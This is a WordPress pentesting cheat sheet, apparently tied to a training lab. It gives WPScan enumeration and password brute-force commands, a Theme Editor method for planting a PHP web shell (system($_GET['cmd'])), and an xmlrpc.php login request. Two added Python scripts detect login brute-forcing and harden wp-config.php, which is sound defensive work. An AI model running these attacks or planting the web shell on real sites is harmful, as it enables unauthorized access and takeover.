Wordpress Pentesting
WordPress Structure
.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
WordPress User Roles
There are five types of users in a standard WordPress installation.
Administrator
This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.
Editor
An editor can publish and manage posts, including the posts of other users.
Author
Authors can publish and manage their own posts.
Contributor
These users can write and manage their own posts but cannot publish them.
Subscriber
These are normal users who can browse posts and edit their profiles.
WPScan
Basic Scan
wpscan --url http://127.0.0.1
Enumerate Plugins using WPScan
wpscan --url http://94.237.49.182:58555/ --enumerate ap
Enumerate Users using WPScan
wpscan --url http://94.237.49.182:58555/ --enumerate u
WPScan Aggressive Mode Plugins
wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60
ALL in ONE WPSCAN Command
wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at,ap,u --plugins-detection aggressive --force
Normal WPSCAN Bruteforce Attack
wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt
BruteForce attack using WPScan
WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: admin, roger, and david. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.
wpscan --password-attack xmlrpc -t 20 -U admin,david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com
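Detection logic for the password attack described above, added here as an example and not part of the original notes. It reads web-server access-log lines in the Apache/nginx combined format and flags any source address that sends more than a threshold of POST requests to wp-login.php or xmlrpc.php inside a sliding time window, which is how both WPScan attack modes look from the server side. The log lines are constructed (documentation addresses 203.0.113.7 and 198.51.100.4), and the threshold and window values are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Login endpoints hit by WPScan's two password-attack modes: wp-login.php (form login)
# and xmlrpc.php (API login). Both are reached with POST requests.
LOGIN_ENDPOINTS = {"/wp-login.php", "/xmlrpc.php"}

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-format access log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        # drop the query string so /wp-login.php?action=... still matches the endpoint
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def find_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {(ip, path): hits} for every source that sent at least `threshold` POSTs
    to one login endpoint inside any `window_seconds` window.

    Status codes are deliberately ignored: xmlrpc.php answers a failed login with an
    XML fault inside an HTTP 200, so request volume per source is the usable signal.
    """
    stamps_by_key = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_ENDPOINTS:
            stamps_by_key[(rec["ip"], rec["path"])].append(rec["ts"])

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):  # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged


def _line(ip, ts, method, path, status):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log (not from a real server).
SAMPLE_LOG = [
    # 12 POSTs to xmlrpc.php from one address within 33 seconds: a password attack
    *[_line("203.0.113.7", f"12/Mar/2024:10:15:{s:02d} +0000", "POST", "/xmlrpc.php", 200)
      for s in range(0, 36, 3)],
    # three form logins from another address hours apart: normal use
    _line("198.51.100.4", "12/Mar/2024:08:00:00 +0000", "POST", "/wp-login.php", 302),
    _line("198.51.100.4", "12/Mar/2024:09:30:00 +0000", "POST", "/wp-login.php", 200),
    _line("198.51.100.4", "12/Mar/2024:11:00:00 +0000", "POST", "/wp-login.php", 302),
    # GETs, non-login POSTs and unparseable lines are not counted
    _line("198.51.100.4", "12/Mar/2024:08:00:05 +0000", "GET", "/wp-login.php?action=lostpassword", 200),
    _line("203.0.113.7", "12/Mar/2024:10:14:50 +0000", "POST", "/wp-comments-post.php", 302),
    "this line is not in combined log format and is skipped",
]

if __name__ == "__main__":
    for (ip, path), hits in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} sent {hits} POSTs to {path} within 60s")
```

Run it against a real access log with `find_bruteforce(open("access.log"))`; a widened window with a lower threshold catches slow, spread-out attempts, as the spaced-out wp-login.php entries in the sample show.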
RCE using ThemeEditor
Log in to the WordPress portal as an Administrator, then open the Theme Editor page.
Edit the theme's 404.php template and add the reverse shell to it.
Alternatively, add the code below instead:
<?php
system($_GET['cmd']);
?>
Save the file and visit the URL below to reach the template and execute the command:
http://<target>/wp-content/themes/twentyseventeen/404.php
and we have successful RCE.
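The defensive counterpart to the theme-editor technique, added here as an example and not from the original notes: WordPress removes the theme and plugin editors from wp-admin, even for Administrators, when wp-config.php defines DISALLOW_FILE_EDIT as true (DISALLOW_FILE_MODS additionally blocks dashboard installs and updates). The script audits a wp-config.php for that setting and rewrites a weak or missing one, taking care of the PHP rule that the first define() of a constant wins. The wp-config.php fragments are constructed, the credentials in them are placeholders, and the function names are my own.

```python
import re

# Matches define('NAME', true/false) as written in wp-config.php, with either quote
# style and optional whitespace inside the parentheses.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<name>[A-Za-z_]+)\1\s*,\s*(?P<value>true|false)\s*\)""",
    re.IGNORECASE,
)

# Constants WordPress honours to turn the built-in file editors off.
EDIT_BLOCKING_CONSTANTS = {"DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS"}
HARDENING_LINE = "define( 'DISALLOW_FILE_EDIT', true );"


def _is_comment(line):
    return line.lstrip().startswith(("//", "#", "/*", "*"))


def _defines(config_text):
    """Yield (line_index, NAME, value) for every active define() in the config."""
    for i, raw in enumerate(config_text.splitlines()):
        if _is_comment(raw):
            continue
        for m in DEFINE_RE.finditer(raw):
            yield i, m.group("name").upper(), m.group("value").lower()


def file_editing_disabled(config_text):
    """True if wp-config.php disables the theme/plugin editors."""
    return any(name in EDIT_BLOCKING_CONSTANTS and value == "true"
               for _, name, value in _defines(config_text))


def harden(config_text):
    """Return the config with DISALLOW_FILE_EDIT set to true.

    PHP keeps the first definition of a constant, so an existing
    define('DISALLOW_FILE_EDIT', false) is rewritten in place; appending a second
    define() later in the file would only raise a warning and leave the editors on.
    """
    if file_editing_disabled(config_text):
        return config_text
    lines = config_text.splitlines()
    for i, name, _ in _defines(config_text):
        if name == "DISALLOW_FILE_EDIT":
            lines[i] = HARDENING_LINE
            return "\n".join(lines) + "\n"
    # Not defined at all: insert before WordPress's "stop editing" marker so the
    # constant exists before wp-settings.php is loaded.
    for i, raw in enumerate(lines):
        if "That's all, stop editing" in raw:
            lines.insert(i, HARDENING_LINE)
            break
    else:
        lines.append(HARDENING_LINE)
    return "\n".join(lines) + "\n"


# Constructed wp-config.php fragment (not from a real site); credentials are placeholders.
WEAK_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'PLACEHOLDER-PASSWORD' );
define( 'WP_DEBUG', false );
define( 'DISALLOW_FILE_EDIT', false );

/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
"""

# Same fragment without any mention of the constant (the WordPress default).
DEFAULT_CONFIG = WEAK_CONFIG.replace("define( 'DISALLOW_FILE_EDIT', false );\n", "")

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("default", DEFAULT_CONFIG)):
        print(f"{label}: editors disabled = {file_editing_disabled(cfg)}")
    print(harden(DEFAULT_CONFIG))
```

Point it at a real file with `harden(open("wp-config.php").read())` and write the result back after review; a commented-out define is treated as absent, which is the same way PHP treats it.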
XMLRPC.php
It is important to note that xmlrpc.php being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed, xmlrpc.php can facilitate some enumeration and exploitation activities, though.
If we have a username and password for the admin user, we can try to retrieve information through xmlrpc.php:
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php